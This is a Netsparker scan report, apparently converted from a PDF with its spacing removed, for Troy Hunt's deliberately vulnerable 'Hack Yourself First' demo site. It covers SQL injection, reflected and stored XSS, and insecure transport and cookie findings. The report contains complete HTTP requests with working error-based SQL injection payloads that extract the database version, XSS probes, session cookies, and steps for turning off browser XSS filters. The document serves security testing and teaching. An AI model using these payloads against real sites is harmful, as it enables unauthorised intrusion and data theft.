Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
21 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101) C
Extracted Datamicrosoft sql azure (rtm) - 110922217 ntaug 20 2014 223756 ntcopyright (c) microsoft corporationn
10 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 209Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=272b+(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)+2b27
ResponsehellipPNETContent-Length 2867Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageConversion failed when converting the varchar value _2dilemma to data typeintExceptionTypeSystemDataSqlClientSqlExceptionStackTrace at SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnectionAction`1 wraphellip
22 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2b
ParametersParameter Type Value
orderBy GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
asc GET false
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET SupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
11 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14292Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
23 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
12 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
24 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
13 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
14 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
